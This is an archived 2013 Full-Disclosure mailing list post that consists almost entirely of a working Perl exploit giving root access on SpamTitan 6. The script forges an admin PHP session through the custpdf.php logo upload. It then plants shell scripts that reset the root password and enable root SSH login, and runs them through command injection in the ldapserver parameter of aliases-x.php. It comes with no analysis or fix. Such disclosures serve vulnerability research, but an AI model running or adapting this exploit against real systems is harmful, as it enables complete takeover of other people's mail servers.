lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <20131119103528.9A052682@lists.grok.org.uk>
Date: Tue, 19 Nov 2013 10:35:28 +0000 (GMT)
from: c1088422@...ts.grok.org.uk
Subject: spamtitan 6 root exploit

# root access on spamtitan

use LWP::UserAgent;

my $url = 'http://address';
my $ua = LWP::UserAgent->new();

my $p = <<'END';
euid|i:2;uid|i:2;name|s:5:"admin";expiry|i:1500000000;locale|s:5:"en_US";admin|b:1;licenseStatus|i:3;licenseNumber|N;licenseType|N;licenseIssuedDate|N;licenseExpiryDate|N;licenseUpdateDate|N;role_id|i:1;role_name|s:13:"Administrator";role_type|N;s:5:"admin";full_admin_role|b:1;
END
$ua->post($url . '/custpdf.php',
    [ 'jaction' => 'savelogo',
      'logo' => [ undef, 'sess_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'Content' => $p ],
    ], 'Content_Type' => 'form-data' );

# in javascript console
# document.cookie = 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
# document.location = '/dashboard.php'

my $p = <<'END';
#!/bin/sh
mount -uw /
chpass -p '$1$TN65SZOW$Ayua2/j.GsQfIQb9UBeTd.' root # "1"
perl -pi -e 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config
pkill -HUP sshd
END
$ua->post($url . '/custpdf.php',
    [ 'jaction' => 'savelogo',
      'logo' => [ undef, 'cfma-mirror.sh', 'Content' => $p ],
    ], 'Content_Type' => 'form-data' );

my $p = <<'END';
/usr/local/bin/sudo /bin/cp /tmp/cfma-mirror.sh /usr/local/bin/cfma-mirror.sh;
/usr/local/bin/sudo /bin/chmod a+x /usr/local/bin/cfma-mirror.sh;
/usr/local/bin/sudo /usr/local/bin/cfma-mirror.sh;
END
$ua->post($url . '/custpdf.php',
    [ 'jaction' => 'savelogo',
      'logo' => [ undef, 'payload.sh', 'Content' => $p ],
    ], 'Content_Type' => 'form-data' );

$ua->get($url . '/aliases-x.php?getLdapDC=foo&ldapserver=;sh /tmp/payload.sh;', (
    'Cookie' => 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' ));

print "root shell ready with password 1\n";

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ